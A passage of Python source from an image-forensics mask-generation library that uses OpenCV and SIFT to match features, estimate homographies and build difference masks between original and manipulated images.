if (w-x + h-y) > 0.5*(mask.size[0] + mask.size[1]):
args['Matcher.TREES'] = 6
args['Matcher.CHECKS'] = 20
matrix,matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=args)
if matrix is not None and isHomographyOk(matrix,img1.size[1],img1.size[0]):
analysis['transform matrix'] = serializeMatrix(matrix)
else:
analysis['transform matrix'] = serializedMatrix
def siftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
Use SIFT to build a homography for transform type changes that manipulated prior masks for probes.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
if globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments):
return
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
analysis['transform matrix'] = serializeMatrix(matrix)
def boundingRegion(mask):
x, y, w, h = widthandheight(mask)
return (x, y), (x + w, y + h)
def boundingRectange(mask):
allpoints = []
contours, hierarchy = cv2api.findContours(np.copy(mask), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for i in range(0, len(contours)):
cnt = contours[i]
allpoints.extend(cnt)
hull = cv2.convexHull(np.asarray(allpoints))
return cv2.minAreaRect(hull)
def _affineTransformDonorImage(initialImage, donorImage, mask, donorMask):
dims = initialImage.shape[2]
IM = (255 - mask)
IDM = (255 - donorMask)
mcenter, mdims, mrotation = boundingRectange(IM)
dcenter, ddims, drotation = boundingRectange(IDM)
ratiox = float(donorImage.shape[0]) / float(initialImage.shape[0])
ratioy = float(donorImage.shape[1]) / float(initialImage.shape[1])
scale = min(float(mdims[0]) * ratiox / ddims[0], float(mdims[1]) * ratioy / ddims[1])
M = cv2.getRotationMatrix2D(mcenter, drotation - mrotation, scale)
IDM3 = np.zeros((donorImage.shape[0], donorImage.shape[1], dims))
IM3 = np.zeros((initialImage.shape[0], initialImage.shape[1], dims))
for i in range(dims):
IDM3[:, :, i] = IDM
IM3[:, :, i] = IM
donorImageSelection = donorImage[:, :, 0:dims] * IDM3
return cv2.warpAffine(donorImageSelection, M, (initialImage.shape[1], initialImage.shape[0]))
def generateOpacityImage(initialImage, donorImage, outputImg, mask, donorMask, tm):
"""
Assume opacity is o such that
outputImg = initialImage*(mask/255) + initialImage*((255-mask)/255)*(1-o) + donorImage*o*((255-donormask)/255)
IM = inverted mask
IDM = inverted donor mask
outputImg - initialImage*(mask/255) = initialImage*IM - initialImage*IM*o + donorImage*o*((255-donormask)/255)
outputImg - initialImage*(mask/255) - initialImage*IM = donorImage*IDM*o - initialImage*IM*o
outputImg - initialImage = donorImage*IDM*o - initialImage*IM*o
outputImg - initialImage = o * (donorImage*IDM - initialImage*IM)
o = (outputImg - initialImage)/(donorImage*IDM - initialImage*IM)
Challenging since the donor mask is not lined up the image exactly.
:param img1:
:param img2:
:param outputImg:
:param mask:
:return:
"""
dims = initialImage.shape[2]
IDM = (255 - donorMask) / 255
IM = (255 - mask) / 255
IDM3 = np.zeros((donorImage.shape[0], donorImage.shape[1], dims))
IM3 = np.zeros((initialImage.shape[0], initialImage.shape[1], dims))
for i in range(dims):
IDM3[:, :, i] = IDM
IM3[:, :, i] = IM
donorImageSelection = (donorImage[:, :, 0:dims] * IDM3)
if tm is not None:
transformedImageAligned = cv2.warpPerspective(donorImageSelection, tm,
(initialImage.shape[1], initialImage.shape[0]),
flags=cv2.INTER_LINEAR,
borderMode=cv2.BORDER_CONSTANT, borderValue=0)
else:
transformedImageAligned = _affineTransformDonorImage(initialImage, donorImage, mask, donorMask).astype('uint8')
# r = i(1-o) + t*o
# r = i - o*i + t*o
# r-i = o*t - o*i
# r-i= o(t-i)
# o = (r-i)/(t-i)
diffDonorImage = abs(transformedImageAligned * IM3 - initialImage * IM3).astype('float32')
diffOutputImage = abs(outputImg[:, :, 0:dims] * IM3 - initialImage * IM3).astype('float32')
result = np.zeros(diffOutputImage.shape)
result[diffDonorImage > 0.0] = diffOutputImage[diffDonorImage > 0] / diffDonorImage[diffDonorImage > 0.0]
result[np.isinf(result)] = 0.0
result[result > 1] = 1.0
if dims > 3:
result[:, :, 3] = 1
return result
def generateOpacityColorMask(initialImage, donorImage, outputImg, mask, donorMask):
result = generateOpacityImage(initialImage, donorImage, outputImg, mask, donorMask)
min = np.min(result)
max = np.max(result)
return (result - min) / (max - min) * 255.0
def optionalSiftAnalysis(analysis, img1, img2, mask=None, linktype=None, arguments=dict(), directory='.'):
"""
If 'location change' is not in parameters or 'location change' is no, skip tis step.
Otherwise, use SIFT to find a homography.
:param analysis:
:param img1:
:param img2:
:param mask:
:param linktype:
:param arguments:
:param directory:
:return:
"""
if 'location change' not in arguments or arguments['location change'] == 'no':
return
globalTransformAnalysis(analysis, img1, img2, mask=mask, arguments=arguments)
if linktype != 'image.image':
return
mask2 = mask.resize(img2.size, Image.ANTIALIAS) if mask is not None and img1.size != img2.size else mask
matrix, matchCount = __sift(img1, img2, mask1=mask, mask2=mask2, arguments=arguments)
if matrix is not None:
analysis['transform matrix'] = serializeMatrix(matrix)
def createMask(img1, img2, invert=False, arguments={}, alternativeFunction=None, convertFunction=None):
mask, analysis, error = __composeMask(img1,
img2,
invert,
arguments=arguments,
alternativeFunction=alternativeFunction,
convertFunction=convertFunction)
analysis['shape change'] = sizeDiff(img1, img2)
if 'location' not in analysis:
analysis['location'] = '(0,0)'
analysis['empty mask'] = 'yes' if np.all(mask == 255) else 'no'
return ImageWrapper(mask), analysis, error
def __indexOf(source, dest):
positions = []
for spos in range(len(source)):
for dpos in range(len(dest)):
if (source[spos] == dest[dpos]).all():
positions.append(spos)
break
return positions
def __flannMatcher(d1, d2, args=None):
FLANN_INDEX_KDTREE = 0
TREES = 16
CHECKS = 50
if 'Matcher.CHECKS' in args:
CHECKS = int(args['Matcher.CHECKS'])
if 'Matcher.TREES' in args:
TREES = int(args['Matcher.TREES'])
index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=TREES)
search_params = dict(checks=CHECKS)
flann = cv2.FlannBasedMatcher(index_params, search_params)
return flann.knnMatch(d1, d2, k=2) if d1 is not None and d2 is not None else []
def getMatchedSIFeatures(img1, img2, mask1=None, mask2=None, arguments=dict(), matcher=__flannMatcher):
img1 = img1.to_rgb(data_type=np.uint8).apply_mask(mask1).to_array()
img2 = img2.to_rgb(data_type=np.uint8).apply_mask(mask2).to_array()
threshold = arguments['sift_match_threshold'] if 'sift_match_threshold' in arguments else 10
maxmatches = int(arguments['homography max matches']) if 'homography max matches' in arguments else 10000
def getRange(size, segment_size=2048):
"""
Divided up the size into segment_size ranges
:param size:
:param segment_size:
:return: list of ranges as representd by tuples(start,end, last range indicator)
"""
ranges = [(x * segment_size, min((x + 1) * segment_size, size), False) for x in range(size / segment_size + 1)]
if ranges[-1][1] - ranges[-1][0] < segment_size and len(ranges) > 1:
ranges = ranges[:-2] + [(ranges[-2][0],ranges[-1][1], True)]
else:
ranges[-1] = (ranges[-1][0], ranges[-1][1], True)
return ranges
def updateKP(kp,pos):
kp.pt = (kp.pt[0]+pos[0], kp.pt[1]+pos[1])
return kp
def filterKP(pt, xstart, xend, ystart, yend):
"""
Filter out points outside the 'window' surrounded by the buffer
:param pt:
:param xstart:
:param xend:
:param ystart:
:param yend:
:return:
"""
return \
(pt[0] >= xstart and pt[0] <= xend) and \
(pt[1] >= ystart and pt[1] <= yend)
def computeSIFTOverRanges(img1,buffer_size=16, segment_size=2048):
total_kp = []
total_d = None
for xrange in getRange(img1.shape[0]):
for yrange in getRange(img1.shape[1]):
(kp, ds) = cv2api.cv2api_delegate.computeSIFT(
img1[max(0,xrange[0]-buffer_size):min(xrange[1]+buffer_size,img1.shape[0]),
max(0,yrange[0]-buffer_size):min(yrange[1]+buffer_size,img1.shape[1])])
xstart = buffer_size - 1 if xrange[0] > 0 else 0
xend = segment_size*2 if xrange[2] else (segment_size + \
(0 if xrange[0] == 0 else buffer_size))
ystart = buffer_size - 1 if yrange[0] > 0 else 0
yend = segment_size*2 if yrange[2] else (segment_size + \
(0 if yrange[0] == 0 else buffer_size))
kept = [kpi for kpi in range(len(kp)) if filterKP(kp[kpi].pt,
xstart,xend,
ystart,yend)]
total_kp.extend([updateKP(kp[kpi],(xrange[0],yrange[0])) for kpi in kept])
if ds is not None:
ds = ds[kept,:]
if total_d is None:
total_d = ds
else:
total_d = np.concatenate((total_d,ds))
return total_kp,total_d
(kp2, d2) = computeSIFTOverRanges(img2)
if kp2 is None or len(kp2) == 0:
return None
(kp1, d1) = computeSIFTOverRanges(img1)
if kp1 is None or len(kp1) == 0:
return None
d1 /= (d1.sum(axis=1, keepdims=True) + 1e-7)
d1 = np.sqrt(d1)
d2 /= (d2.sum(axis=1, keepdims=True) + 1e-7)
d2 = np.sqrt(d2)
matches = matcher(d1,d2, args=arguments)
# store all the good matches as per Lowe's ratio test.
good = [m for m, n in matches if m.distance < 0.75 * n.distance]
good = sorted(good, lambda g1, g2: -int(max(g1.distance, g2.distance) * 1000))
good = good[0:min(maxmatches, len(good))]
if len(good) >= threshold:
src_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)
dst_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)
return (src_pts, dst_pts) if src_pts is not None else None
return None
def _remap(img, mask, src_pts, dst_pts):
from scipy.interpolate import griddata
long = mask.reshape(mask.shape[0] * mask.shape[1])
grid_x, grid_y = np.mgrid[0:mask.shape[0], 0:mask.shape[1]]
grid_z = griddata(np.array(dst_pts),
np.array(src_pts), (grid_x, grid_y), method='cubic', rescale=True)
map_x = np.append([], [ar[:, 0] for ar in grid_z])
map_y = np.append([], [ar[:, 1] for ar in grid_z])
default_x = np.append([], [ar for ar in grid_x])
default_y = np.append([], [ar for ar in grid_y])
# remove remaps outside the mask
map_x[long == 0] = default_x[long == 0]
map_y[long == 0] = default_y[long == 0]
# fix nan's with no mapping
jj = np.where(np.isnan(map_x))
map_x[jj] = default_x[jj]
jj = np.where(np.isnan(map_y))
map_y[jj] = default_y[jj]
map_x_32 = map_x.astype('float32').reshape(mask.shape)
map_y_32 = map_y.astype('float32').reshape(mask.shape)
return cv2.remap(img, map_y_32, map_x_32, cv2.INTER_NEAREST)
def __grid(img1, img2, compositeMask, edgeMask=None, arguments=None):
"""
Compute sparse maps from points between img1 to img2
:param img1:
:param img2:
:param mask1:
:param mask2:
@type img1: ImageWrapper
@type img2: ImageWrapper
:return: None if a matrix cannot be constructed, otherwise a 3x3 transform matrix
"""
src_dts_pts = getMatchedSIFeatures(img1, img2, mask1=edgeMask, mask2=None, arguments=arguments)
if src_dts_pts is None:
return compositeMask
newMask = _remap(compositeMask, edgeMask,
[[x[0][1], x[0][0]] for x in src_dts_pts[0].astype('int')],
[[x[0][1], x[0][0]] for x in src_dts_pts[1].astype('int')])
# r = np.zeros(r.shape).astype('uint8')
# for x in range(len(src_dts_pts[1])):
# cv2.line(r,tuple(src_dts_pts[0][x][0]),tuple(src_dts_pts[1][x][0]),255)
# r[int(x[0][1]),int(x[0][0])] = 255
return newMask
def __sift(img1, img2, mask1=None, mask2=None, arguments=None):
"""
Compute homography to transfrom img1 to img2
Apply the mask to each in order to only compare relevent regions of images
:param img1:
:param img2:
:param mask1:
:param mask2:
@type img1: ImageWrapper
@type img2: ImageWrapper
:return: None if a matrix cannot be constructed, otherwise a 3x3 transform matrix
"""
arguments = dict(arguments)
homography = arguments['homography'] if arguments is not None and 'homography' in arguments else 'RANSAC-4'
if homography in ['None', 'Map']:
return None, None
elif homography in ['All'] and 'homography max matches' in arguments:
# need as many as possible
arguments.pop('homography max matches')
src_dts_pts = getMatchedSIFeatures(img1, img2, mask1=mask1, mask2=np.asarray(mask2), arguments=arguments)
if src_dts_pts is not None:
new_src_pts = src_dts_pts[0]
new_dst_pts = src_dts_pts[1]
matches = None
if homography == 'LMEDS':
M1, matches = cv2.findHomography(new_src_pts, new_dst_pts, cv2.LMEDS)
elif homography == 'All':
M1, matches = cv2.findHomography(new_src_pts, new_dst_pts)
elif homography.find('-') > 0:
try:
RANSAC_THRESHOLD = float(homography[homography.find('-') + 1])
except:
RANSAC_THRESHOLD = 10.0
if matches is None:
M1, matches = cv2.findHomography(new_src_pts, new_dst_pts, cv2.RANSAC, RANSAC_THRESHOLD)
matchCount = np.sum(matches)
if float(matchCount) / len(src_dts_pts) < 0.15 and matchCount < 30:
return None, None
return M1, matchCount
return None, None
def applyResizeComposite(compositeMask, shape, interpolation=2):
"""
Resize the composite mask
:param compositeMask:
:param transform_matrix:
:return:
"""
newMask = np.zeros(shape).astype('uint8')
for level in list(np.unique(compositeMask)):
if level == 0:
continue
levelMask = np.zeros(compositeMask.shape).astype('uint16')
levelMask[compositeMask == level] = 1024
newLevelMask = cv2.resize(levelMask, (shape[1], shape[0]),interpolation=interpolation)
newMask[newLevelMask > 300] = level
return newMask
class Flipper:
def __init__(self, mask, flip):
self.mask = mask
self.flipdirection = flip
self.region = boundingRegion(mask)
def _lcs(self, alist, blist):
"""
:param alist
:param blist:
:return:
"""
m = len(alist)
n = len(blist)
counter = [[0] * (n + 1) for x in range(m + 1)]
longest = 0
lcs_set = (0, 0)
for i in range(m):
for j in range(n):
if alist[i] == blist[j]:
c = counter[i][j] + 1
counter[i + 1][j + 1] = c
if c > longest:
lcs_set = (i, j)
longest = c
return lcs_set, longest
def flip(self, compositeMask):
flipped = compositeMask[self.region[0][1]:self.region[1][1], self.region[0][0]:self.region[1][0]]
flipped = cv2.flip(flipped,
1 if self.flipdirection == 'horizontal' else (-1 if self.flipdirection == 'both' else 0))
flipCompositeMask = np.zeros(self.mask.shape).astype('uint8')
flipCompositeMask[self.region[0][1]:self.region[1][1], self.region[0][0]:self.region[1][0]] = flipped
return flipCompositeMask
def applyFlipComposite(compositeMask, mask, flip):
"""
Since SIFT Cannot flip
Flip the selected area
:param compositeMask:
:param mask:
:param flip:
:return:
"""
maskInverted = ImageWrapper(np.asarray(mask)).invert().to_array()
flipper = Flipper(maskInverted, flip)
maskAltered = np.copy(mask)
maskAltered[maskAltered > 0] = 1
def work(levelMask):
flipCompositeMask = flipper.flip(levelMask)
return (flipCompositeMask + levelMask * maskAltered).astype('uint8')
return applyToComposite(compositeMask,work)
def applyToComposite(compositeMask, func, shape=None):
"""
Loop through each level add apply the function.
Need to convert levels to 0 and unmapped levels to 255
:param compositeMask:
:param mask:
:param transform_matrix:
:return:
"""
newMask = np.zeros(shape if shape is not None else compositeMask.shape).astype('uint8')
for level in list(np.unique(compositeMask)):
if level == 0:
continue
levelMask = np.zeros(compositeMask.shape).astype('uint8')
levelMask[compositeMask == level] = 255
newLevelMask = func(levelMask)
if newLevelMask is not None:
newMask[newLevelMask > 100] = level
return newMask
def applyGridTransformCompositeImage(compositeMask, startIm, destIm, edgeMask=None, arguments={}):
newMask = np.zeros((destIm.image_array.shape[0], destIm.image_array.shape[1]), dtype=np.uint8)
arguments = dict(arguments)
if 'homography max matches' in arguments:
arguments.pop('homography max matches')
levels = list(np.unique(compositeMask))
for level in levels:
if level == 0:
continue
levelMask = np.zeros(compositeMask.shape).astype('uint16')
levelMask[compositeMask == level] = 255
newlevelmask = __grid(startIm, destIm, levelMask, edgeMask=255 - edgeMask, arguments=arguments)
if newlevelmask is not None:
newMask[newlevelmask > 100] = level
return newMask
def applyInterpolateToCompositeImage(compositeMask, startIm, destIm, edgeMask, inverse=False, arguments={},
defaultTransform=None,
withMask = False):
"""
Loop through each level add apply SIFT to transform the mask
:param compositeMask:
:param mask:
:param transform_matrix:
:return:
@type destIm: ImageWrapper
@type startIm: ImageWrapper
"""
newMask = np.zeros((destIm.image_array.shape[0], destIm.image_array.shape[1]), dtype=np.uint8)
if 'homography' in arguments and arguments['homography'] == 'Map':
return applyGridTransformCompositeImage(compositeMask,
startIm,
destIm,
edgeMask=edgeMask,
arguments=arguments)
if 'homography' in arguments and arguments['homography'] == 'None':
return compositeMask
levels = list(np.unique(compositeMask))
flags = cv2.WARP_INVERSE_MAP if inverse else cv2.INTER_LINEAR
borderValue = 0
for level in levels:
if level == 0:
continue
if defaultTransform is None or (
'composite homography' in arguments and arguments['composite homography'] == 'Multiple'):
levelMask = np.zeros(compositeMask.shape).astype('uint8')
levelMask[compositeMask == level] = 200
TM, matchCountResult = __sift(startIm, destIm, mask1=levelMask, mask2=invertMask(ImageWrapper(edgeMask)), arguments=arguments)
else:
TM = defaultTransform
levelMask = np.zeros(compositeMask.shape).astype('uint16')
levelMask[compositeMask == level] = 8000
if TM is None:
newLevelMask = cv2.resize(levelMask, (destIm.size[0], destIm.size[1]))
elif withMask:
newLevelMask = applyTransform(levelMask,
mask=edgeMask,
transform_matrix=TM,
invert=inverse,
shape=(destIm.size[1], destIm.size[0]))
else:
newLevelMask = cv2.warpPerspective(levelMask, TM, (destIm.size[0], destIm.size[1]),
flags=flags,
borderMode=cv2.BORDER_CONSTANT, borderValue=borderValue)
if newLevelMask is not None:
newMask[newLevelMask > 100] = level
return newMask
def applyRotateToCompositeImage(img, angle, pivot):
"""
Loop through each level add apply the rotation.
Need to convert levels to 0 and unmapped levels to 255
:param img:
:param angle:
:param pivot:
:return:
"""
from functools import partial
func = partial(rotateImage, angle, pivot)
return applyToComposite(img, func, shape=img.shape)
def applyTransformToComposite(compositeMask, mask, transform_matrix, shape=None, returnRaw=False):
"""
Loop through each level add apply the transform.
Need to convert levels to 0 and unmapped levels to 255
:param compositeMask:
:param mask:
:param transform_matrix:
:return:
"""
from functools import partial
func = partial(applyTransform, mask=mask, transform_matrix=transform_matrix, shape=shape, returnRaw=returnRaw)
return applyToComposite(compositeMask, func, shape=shape)
def applyPerspectiveToComposite(compositeMask, transform_matrix, shape):
def perspectiveChange(composite_mask, M=None, shape=None):
return cv2.warpPerspective(composite_mask, M, (shape[1], shape[0]))
from functools import partial
func = partial(perspectiveChange, M=transform_matrix, shape=shape)
return applyToComposite(compositeMask, func, shape=shape)
def applyAffineToComposite(compositeMask, transform_matrix, shape):
def perspectiveChange(composite_mask, M=None, shape=None):
return cv2.warpAffine(composite_mask, M, (shape[1], shape[0]))
from functools import partial
func = partial(perspectiveChange, M=transform_matrix, shape=shape)
return applyToComposite(compositeMask, func, shape=shape)
def applyRotateToComposite(rotation, compositeMask, edgeMask, expectedDims, local=False):
"""
Loop through each level add apply the rotation.
Need to convert levels to 0 and unmapped levels to 255
:param rotation:
:param compositeMask:
:param edgeMask:
:param expectedDims:
:param local
:return:
"""
from functools import partial
if local:
func = partial(__localrotateImage, rotation, edgeMask, expectedDims=expectedDims, cval=255)
else:
func = partial(__rotateImage, rotation, expectedDims=expectedDims, cval=255)
return applyToComposite(compositeMask, func, shape=expectedDims)
def isHomographyOk(transform_matrix, h, w):
# convert cornore to homogenous coordinates
ll = np.array([0, 0, 1])
ul = np.array([0, w, 1])
lr = np.array([h, 0, 1])
ur = np.array([h, w, 1])
if transform_matrix.shape == (2,3):
transform_matrix = np.vstack([transform_matrix,[0,0,1.0]])
a_ll = np.matmul(transform_matrix, ll)
a_ul = np.matmul(transform_matrix, ul)
a_ur = np.matmul(transform_matrix, ur)
a_lr = np.matmul(transform_matrix, lr)
# convert points to lines
a = np.cross(a_ll, a_ul)
b = np.cross(a_lr, a_ur)
# find point of intersection
intersection_point_projective = np.cross(a, b)
if intersection_point_projective[2] == 0:
return False
y_vertical = intersection_point_projective[0] / intersection_point_projective[2]
x_vertical = intersection_point_projective[1] / intersection_point_projective[2]
a = np.cross(a_ul, a_ur)
b = np.cross(a_ll, a_lr)
# find point of intersection
intersection_point_projective = np.cross(a, b)
if intersection_point_projective[2] == 0:
return False
y_horizontal = intersection_point_projective[0] / intersection_point_projective[2]
x_horizontal = intersection_point_projective[1] / intersection_point_projective[2]
# if the resulting lines intersect inside the box, fail
return not (0 <= x_vertical <= w and 0 <= y_vertical <= h) and not (
0 <= x_horizontal <= w and 0 <= y_horizontal <= h)
# Or is more appropriate to look at the hull of the shape.
# point = Point(x,y)
# points = [(d[0] / d[2], d[1] / d[2]) for d in [a_ll,a_ul,a_ur,a_lr]]
##polygon = Polygon(points).convex_hull
# return not polygon.contains(point)
def applyTransform(compositeMask, mask=None, transform_matrix=None, invert=False, returnRaw=False, shape=None):
"""
Ceate a new mask applying the transform to only those parts of the
compositeMask that overlay with the provided mask.
:param compositeMask:
:param mask: 255 for unmanipulated pixels
:param transform_matrix:
:param invert:
:param returnRaw: do merge back in the composite
:return:
"""
flags = cv2.WARP_INVERSE_MAP if invert else cv2.INTER_LINEAR # +cv2.CV_WARP_FILL_OUTLIERS
maskInverted = ImageWrapper(np.asarray(mask)).invert().to_array()
maskInverted[maskInverted > 0] = 1
compositeMaskFlipped = compositeMask
# resize only occurs by user error.
if compositeMaskFlipped.shape != maskInverted.shape:
compositeMaskFlipped = cv2.resize(compositeMaskFlipped, (maskInverted.shape[1], maskInverted.shape[0]))
compositeMask = cv2.resize(compositeMask, (maskInverted.shape[1], maskInverted.shape[0]))
if shape is None:
shape = mask.shape
# zeros out areas outside the mask
compositeMaskAltered = compositeMaskFlipped * maskInverted
maxvalue = compositeMaskAltered.max()
compositeMaskAltered[compositeMaskAltered > 0] = maxvalue-20
if transform_matrix.shape[0] == 2:
newMask = cv2.warpAffine(compositeMaskAltered, transform_matrix, (shape[1], shape[0]), flags=flags,
borderMode=cv2.BORDER_CONSTANT, borderValue=0)
else:
newMask = cv2.warpPerspective(compositeMaskAltered, transform_matrix, (shape[1], shape[0]), flags=flags,
borderMode=cv2.BORDER_CONSTANT, borderValue=0)
newMask[newMask > 99] = maxvalue
newMask[newMask < 100] = 0
# put the areas outside the mask back into the composite
maskAltered = np.copy(mask)
maskAltered[maskAltered > 0] = 1
if returnRaw:
return newMask
newMask = newMask | compositeMask * maskAltered
return newMask
def cropResize(img,location, wh):
img_crop = img[location[0]:wh[0],location[1]:wh[1],:]
return cv2.resize(img_crop, (img.shape[1],img.shape[0]))
def cropResizeCompare(img1, img2, arguments=dict()):
width_and_height = (int(arguments['crop width']), int(arguments['crop height']))
pre_resize_img = cv2.resize(img2, width_and_height)
return composeCropImageMask(img1, pre_resize_img, location=None)
def cropCompare(img1, img2, arguments=dict()):
from maskgen.image_wrap import ImageWrapper
if (sum(img1.shape) > sum(img2.shape)):
img1_m, img2_m = __alignChannels(ImageWrapper(img1), ImageWrapper(img2))
analysis = {'shape change': sizeDiff(ImageWrapper(img1_m), ImageWrapper(img2_m))}
location = getValue(arguments,'location',None)
if type(location) == str:
location = toIntTuple(location)
mask, analysis_d = composeCropImageMask(img1_m, img2_m,location=location)
analysis.update(analysis)
return mask, analysis_d
return None, {}
def _composeLCS(img1, img2):
from scipy import sparse
m = img1.shape[0] * img1.shape[1]
n = img2.shape[0] * img2.shape[1]
LCS = sparse.lil_matrix((m + 1, n + 1), dtype=np.int8)
# that L[i][j] contains length of LCS of X[0..i-1] and Y[0..j-1]
for i in xrange(1, m + 1, 1):
for j in xrange(1, n + 1, 1):
x1 = (i - 1) % img1.shape[0]
y1 = (i - 1) / img1.shape[0]
x2 = (j - 1) % img2.shape[0]
y2 = (j - 1) / img2.shape[0]
if img1[x1, y1] == img2[x2, y2]:
LCS[i, j] = LCS[i - 1, j - 1] + 1
else:
m = max(LCS[i - 1, j], LCS[i, j - 1])
if m > 0:
LCS[i, j] = m
# Start from the right-most-bottom-most corner and
# one by one store characters in lcs[]
i = m - 1
j = n - 1
mask = np.zeros(img1.shape, dtype=np.uint8)
while i >= 0 and j >= 0:
x1 = i % img1.shape[0]
y1 = i / img1.shape[0]
x2 = j % img2.shape[0]
y2 = j / img2.shape[0]
if img1[x1, y1] == img2[x2, y2]:
mask[x1, y1] = 255
i -= 1
j -= 1
# If not same, then find the larger of two and
# go in the direction of larger value
elif LCS[i - 1, j] > LCS[i, j - 1]:
i -= 1
else:
j -= 1
def __search1(pixel, img2, tally, endx, endy, x, y):
from collections import deque
def __addToQueue(x, y, endx, endy, queue):
if x > endx:
queue.append((x - 1, y))
if y > endy:
queue.append((x, y - 1))
if x > endx:
queue.append((x - 1, y - 1))
pixel2 = img2[x, y]
if pixel == pixel2:
return (x, y)
queue = deque()
__addToQueue(x, y, endx, endy, queue)
while len(queue) > 0:
x, y = queue.popleft()
pixel2 = img2[x, y]
if pixel == pixel2:
return x, y
if tally[x, y] == 0:
__addToQueue(x, y, endx, endy, queue)
return None
def __search(pixel, img2, tally, position, depth):
startx = min(max(0, position[0] - depth[0]), img2.shape[0])
starty = min(max(0, position[1] - depth[1]), img2.shape[1])
endx = min(position[0] + depth[0], img2.shape[0]) + 1
endy = min(position[1] + depth[1], img2.shape[1]) + 1
imgbox = img2[startx:endx, starty:endy]
image_positions = zip(*np.where(imgbox == pixel))
if len(image_positions) > 0:
tallybox = tally[startx:endx, starty:endy]
tallypostions = zip(*np.where(tallybox > 0))
if len(tallypostions) > 0:
maxtally = max(tallypostions)
image_positions = [p for p in image_positions if p > maxtally]
else:
return None
if len(image_positions) > 0:
best = min(image_positions)
return startx + best[0], starty + best[1]
return None
def _tallySeam(img1, img2, minDepth=50):
tally1 = np.zeros(img1.shape)
tally2 = np.zeros(img2.shape)
depth_x = max(img2.shape[0] - img1.shape[0], minDepth)
depth_y = max(img2.shape[1] - img1.shape[1], minDepth)
for x1 in range(img1.shape[0]):
for y1 in range(img1.shape[1]):
pos = __search(img1[x1, y1], img2, tally2, (x1, y1), (depth_x, depth_y))
if pos is not None:
tally1[x1, y1] = 1
tally2[pos[0], pos[1]] = 1
return tally1.astype('uint8') * 255
def rotateCompare(img1, img2, arguments=dict()):
rotation = float(arguments['rotation']) if 'rotation' in arguments else 0.0
local = (arguments['local'] == 'yes') if 'local' in arguments else False
if img1.shape == img2.shape:
mask1, analysis1 = __diffMask(img1, img2, False, args=arguments)
if abs(rotation) < 0.0001:
return mask1, analysis1
mask2, analysis2 = __compareRotatedImage(rotation, img1, img2, arguments)
diff = sumMask(mask1) - sumMask(mask2)
return (mask1, analysis1) if diff < 0 or local else (mask2, analysis2)
else:
return __compareRotatedImage(rotation, img1, img2, arguments)
def resizeImage(img1, shape, interpolation):
name_map = {
'bicubic': cv2api.cv2api_delegate.inter_cubic,
'nearest': cv2api.cv2api_delegate.inter_nn,
'bilinear': cv2api.cv2api_delegate.inter_linear,
'cubic': cv2api.cv2api_delegate.inter_cubic,
'mesh': cv2api.cv2api_delegate.inter_area,
'lanczos': cv2api.cv2api_delegate.inter_lanczos
}
inter_val = name_map[interpolation] if interpolation in name_map else cv2api.cv2api_delegate.inter_nn
return cv2.resize(img1, (shape[1], shape[0]), interpolation=inter_val)
def resizeCompare(img1, img2, arguments=dict()):
new_img2 = resizeImage(img2,
img1.shape,
arguments['interpolation'] if 'interpolation' in arguments else 'nearest')
return __diffMask(img1, new_img2, False, args=arguments)
def moving_average(a, n=3):
ret = np.cumsum(a, dtype=float)
ret[n:] = ret[n:] - ret[:-n]
return ret[n - 1:] / n
def morphologyCompare(img_one, img_two, arguments= {}):
kernel_size = int(getValue(arguments, 'kernel', 3))
kernel = np.ones((kernel_size, kernel_size), np.uint8)
diff = (np.abs(img_one - img_two)).astype('uint16')
mask = np.sum(diff, 2)
difference = float(arguments['tolerance']) if arguments is not None and 'tolerance' in arguments else 0.00390625
difference = difference * 256
mask[np.where(mask < difference)] = 0
if getValue(arguments, 'distribute_difference', False):
mask = 255*mask.astype(np.double)/(np.max(mask)-difference)
mask = mask.astype('uint8')
else:
# set to black if less than threshold
mask[np.where(mask > 0)] = 255
mask = mask.astype('uint8')
mask = cv2.morphologyEx(mask,cv2.MORPH_OPEN, kernel)
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)# filter out noise in the mask
return mask, {}
def mediatedCompare(img_one, img_two, arguments={}):
morphologyOps = {'open':cv2.MORPH_OPEN, 'close':cv2.MORPH_CLOSE}
morphology_order = getValue(arguments, 'morphology order', 'open:close').split(':')
gain = int(getValue(arguments, 'gain', 0))
kernel_size=int(getValue(arguments, 'kernel',3))
weight = int(getValue(arguments, 'weight', 1.0))
smoothing = int(getValue(arguments, 'smoothing', 3))
algorithm = getValue(arguments, 'filling', 'morphology')
aggregate = getValue(arguments, 'aggregate', 'max')
kernel = np.ones((kernel_size, kernel_size), np.uint8)
max_threshold = int(getValue(arguments, 'maximum threshold', 255))
from scipy import signal
# compute diff in 3 colors
if aggregate == 'luminance':
min_threshold = int(getValue(arguments, 'minimum threshold', 3))
img_one = cv2.cvtColor(img_one.astype('uint8'), cv2.COLOR_BGR2YCR_CB)
img_two = cv2.cvtColor(img_two.astype('uint8'), cv2.COLOR_BGR2YCR_CB)
diff = (np.abs(img_one.astype('int16') - img_two.astype('int16')))
mask = diff[:, :, 0] + (diff[:, :, 2] + diff[:, :, 1])/weight
bins = 256 + 512/weight
else:
min_threshold = int(getValue(arguments, 'minimum threshold', 0))
diff = (np.abs(img_one.astype('int16') - img_two.astype('int16'))).astype('uint16')
if aggregate == 'max':
mask = np.max(diff, 2) # use the biggest difference of the 3 colors
bins=256
elif aggregate == 'sum':
mask = np.sum(diff, 2)
bins=768
else:
mask = np.mean(diff, 2)
bins = 256
hist, bin_edges = np.histogram(mask, bins=bins, density=False)
if smoothing > 0:
hist = moving_average(hist,n=smoothing) # smooth out the histogram
minima = signal.argrelmin(hist, order=1) # find local minima
size = minima[0].size
minima = minima[0][0] if size > 0 else 0
else:
size = 0
minima = min_threshold
if size == 0 or minima > bins/2: # if there was no minima, hardcode
threshold = min_threshold
else:
threshold = max(min_threshold,min(minima, max_threshold)) # Use first minima
threshold += gain
